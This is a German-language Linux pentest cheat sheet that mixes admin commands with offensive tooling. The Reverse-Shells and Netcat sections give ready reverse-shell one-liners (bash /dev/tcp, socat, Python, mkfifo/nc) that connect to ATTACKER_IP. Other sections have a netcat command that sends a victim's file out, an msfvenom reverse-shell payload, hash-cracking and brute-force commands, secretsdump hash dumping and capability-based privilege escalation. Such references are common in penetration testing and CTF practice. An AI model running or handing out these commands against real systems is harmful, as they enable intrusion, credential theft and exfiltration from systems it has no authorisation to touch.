Cheatsheet (exkl. Win)

🖥️ System Basics

System‑Info

uname -a                     # Kernel + Architektur
cat /etc/os-release          # Distro‑Details
lscpu | head                 # CPU‑Info
free -m                      # RAM
uptime -p                    # Laufzeit
whoami && id                 # Aktueller User + Privs
hostname -I                  # Lokale IP‑Adressen

Prozess & Service

ps aux | head                # Laufende Prozesse (erste 10)
top / htop                   # Live‑Übersicht
pgrep -u <USER> bash         # PIDs des Users finden
pkill -9 <PID>               # Prozess hart killen
systemctl status <SERVICE>   # Service‑Status
systemctl restart <SERVICE>  # Service neu starten

Dateien & Suche

find . -type f -name "*.php"         # Rekursive Dateisuche
grep -R "password" .                 # Inhalt suchen
sed -n '1,20p' <FILE>                # Zeilen anzeigen
awk -F: '{print $1}' /etc/passwd     # Feld extrahieren
xargs -a list.txt rm                 # Batch‑Aktion
sort | uniq -c | sort -nr            # Duplikate zählen
head -n 50 <FILE>; tail -n 20 <FILE> # Anfang & Ende

Berechtigungen

chmod 755 <FILE>                    # Rechte setzen (rwxr‑xr‑x)
chown <USER>:<GROUP> <FILE>         # Besitzer ändern
getfacl <FILE>                      # ACL anzeigen
setfacl -m u:<USER>:r <FILE>        # ACL setzen

getcap -r / 2>/dev/null             # Linux‑Capabilities finden
setcap cap_setuid+ep /bin/bash      # Beispiel: SUID‑ähnlich

Paket & Updates

apt update && apt upgrade -y        # Debian/Ubuntu
yum update -y                       # CentOS/RHEL
pacman -Syu                         # Arch

Disk & RAM & Network‑Übersicht

df -h                               # Plattenbelegung
du -sh * | sort -h                  # Ordnergrössen
ss -tulpn | head                    # Offene Ports (tcp/udp, listening)
ip a                                # Interfaces
ip route                            # Routing‑Tabelle
tcpdump -i <IFACE> port 80 -c 10    # 10 Pakete auf Port 80 mitschneiden

Archivierung & Kompression

# TAR
tar -xvf <FILE>.tar                     # Extract
tar -xzvf <FILE>.tar.gz                 # mit gzip
tar -cvf <ARCHIVE>.tar <DIR>/           # Packen
# ZIP
zip -r <ARCHIVE>.zip <DIR>/             # Packen
unzip <FILE>.zip                        # Entpacken
# 7Z
7z a <ARCHIVE>.7z <DIR>/                # Packen
7z x <FILE>.7z                          # Entpacken

Quick Transfer & Listener

python3 -m http.server 8000                # Mini‑HTTP‑Server im aktuellen Pfad
php -S 0.0.0.0:8000                        # PHP‑Server – gut für Uploads
nc -lvnp <LPORT> > <OUT.FILE>              # Datei empfangen (Listener‑Host)
nc <ATTACKER_IP> <LPORT> < <IN.FILE>       # Datei senden (Opfer)
scp <FILE> <USER>@<HOST>:/tmp              # SCP Copy
rsync -avz <DIR>/ <USER>@<HOST>:/tmp       # Schnelles Delta‑Copy

Reverse‑Shells (inkl. TTY‑Fix)

# Bash 1‑Liner
bash -i >& /dev/tcp/<ATTACKER_IP>/<LPORT> 0>&1

# Socat (stabil, vollwertiges TTY)
# Listener
socat TCP-LISTEN:<LPORT>,reuseaddr,fork STDOUT,stderr
# Opfer‑Shell
a=</bin/bash; socat TCP:<ATTACKER_IP>:<LPORT> EXEC:$a,pty,stderr,setsid,sigint,sane

# Python
python3 -c 'import pty,os,socket,subprocess;s=socket.socket();s.connect(("<ATTACKER_IP>",<LPORT>));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Git Basics

git clone <REPO_URL>
git log --oneline -n 5                 # Kurze Historie
git checkout -b <BRANCH>               # Neue Branch

📡 Netzwerk / Enumeration

Warum? Dienste entdecken, Ports prüfen, Tunnel legen.

SSH + Tunneling (Port‑Weiterleitungen)

ssh <USER>@<HOST>                           # Passwort‑Login
ssh -i <KEYFILE> <USER>@<HOST>              # Key‑Auth
ssh -p <PORT> <USER>@<HOST>                 # Anderer Port

# Local‑Forward: Zugriff auf internen Dienst über localhost:8080
ssh -L 8080:<TARGET_IP>:80 <USER>@<HOST>

# Reverse‑Forward: Expose eigenen Port 4444 IN das entfernte Netz
ssh -R 4444:localhost:4444 <USER>@<HOST>

# Dynamisch (SOCKS‑Proxy): leitet ganzen Traffic (–> ProxyChains)
ssh -D 1080 <USER>@<HOST>

Netcat Tricks

# Standard‑Listener
nc -lvnp <LPORT>
# Verbinden
nc <HOST> <PORT>
# Listener mit Befehl‑History (rlwrap)
rlwrap nc -lvnp <LPORT>
# Named‑Pipe Shell – trickst EOF aus
mkfifo /tmp/f; /bin/sh 0</tmp/f | nc <ATTACKER_IP> <LPORT> >/tmp/f

Port‑Scan Quickies

nmap -sC -sV -oN init <HOST>                   # Default‑Scripts + Versionen
nmap -p- --min-rate 1000 <HOST>                # Alle Ports schnell
nmap --script vuln -oN vuln <HOST>             # Vuln‑Scripts
masscan -p1-65535 --rate 10000 <HOST>          # Super‑schnell (root)

Web‑Fuzzing

gobuster dir  -u http://<HOST> -w /usr/share/wordlists/dirb/common.txt -x php,txt -t 50
ffuf -u http://<HOST>/FUZZ -w wordlist.txt -mc 200,204,301,302
wfuzz -c -w wordlist.txt -u http://<HOST>/?file=FUZZ -hc 404

SMB & Windows‑Enum

smbclient -L \\<HOST> -N                        # Shares listen
enum4linux-ng <HOST>                              # Voll‑Enum
impacket-smbserver <SHARE> .                      # Schneller SMB‑Server

Container‑Blick

docker ps -a                                    # Alle Container
docker exec -it <CONTAINER_ID> /bin/sh          # Interaktiv einsteigen

🔐 Passwörter & Hashes

# Hashcat – Beispiele
hashcat -m 0 -a 0 <HASHFILE> rockyou.txt         # MD5 Wordlist‑Attacke
hashcat -a 3 -m 1800 <HASHFILE> ?a?a?a?a?a?a      # Bruteforce sha512crypt

# John
john <HASHFILE> --wordlist=rockyou.txt
john --show <HASHFILE>

# WPA (aircrack)
aircrack-ng <CAPTURE>.cap -w rockyou.txt

# Openssl – Passwort & File‑Crypto
openssl passwd -1 -salt <SALT> <PASSWORD>        # MD5‑Crypt Hash
openssl enc -aes-256-cbc -in <FILE> -out <FILE>.enc -k <PASS>
openssl enc -d -aes-256-cbc -in <FILE>.enc -out <FILE> -k <PASS>

# Base64 Encode/Decode
echo -n "text" | base64
echo "dGV4dA==" | base64 -d

📚 Privilege Escalation Quick‑Wins

sudo -l                                         # Welche Befehle darf ich mit sudo?
find / -perm -4000 -type f 2>/dev/null | grep -v "bin"  # SUID‑Files ohne Standard‑Bins
linpeas.sh / winpeas.exe                       # Automatisierte Enum
getcap -r / 2>/dev/null                        # Capabilities suchen
capsh --print                                  # Aktive Cap‑Sets

🛠️ OffSec‑Tools

Gruppiert nach Einsatzzweck. Meist genügen Basis‑Args plus Wordlisten.

Scanning & Enum

nmap, masscan, rustscan
amass enum -d <DOMAIN> -o enum.txt           # Sub‑Domains
subfinder -d <DOMAIN>

Web Fuzz & Vuln

gobuster, ffuf, wfuzz, dirsearch
nikto -h http://<HOST>
wpscan --url http://<HOST>

Exploit & PoC

searchsploit <SOFTWARE> <VERSION>
msfconsole -> search <CVE> ; use exploit/... ; set RHOSTS <HOST> ; run
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<LPORT> -f elf > rev.elf

Password & Hash Attack

hydra -l <USER> -P rockyou.txt <HOST> http-get /login
medusa -u <USER> -P rockyou.txt -h <HOST> -M ssh

Lateral Movement / Impacket

impacket-psExec <DOMAIN>/<USER>:<PASS>@<HOST>                              # Remote CMD
impacket-secretsdump -sam -system -security LOCAL <HOST>                   # Hash‑Dump
impacket-smbserver <SHARE> .                                               # Drop‑Zone

SQL & DB

sqlmap -u "http://<HOST>/vuln.php?id=1" --dbs --batch
sqlite3 <DBFILE> ".tables"

Packet & Traffic

tcpdump -i <IFACE> -w capture.pcap
wireshark capture.pcap (GUI)

Wordlists & Crunch

crunch 8 8 abc123 -o list.txt                 # Länge 8, Charset
cewl http://<HOST> -w words.txt               # Wörter aus Seite

⏹️ Cheatsheet Ende

Feedback? -> Ergänzen wir sofort.

Last updated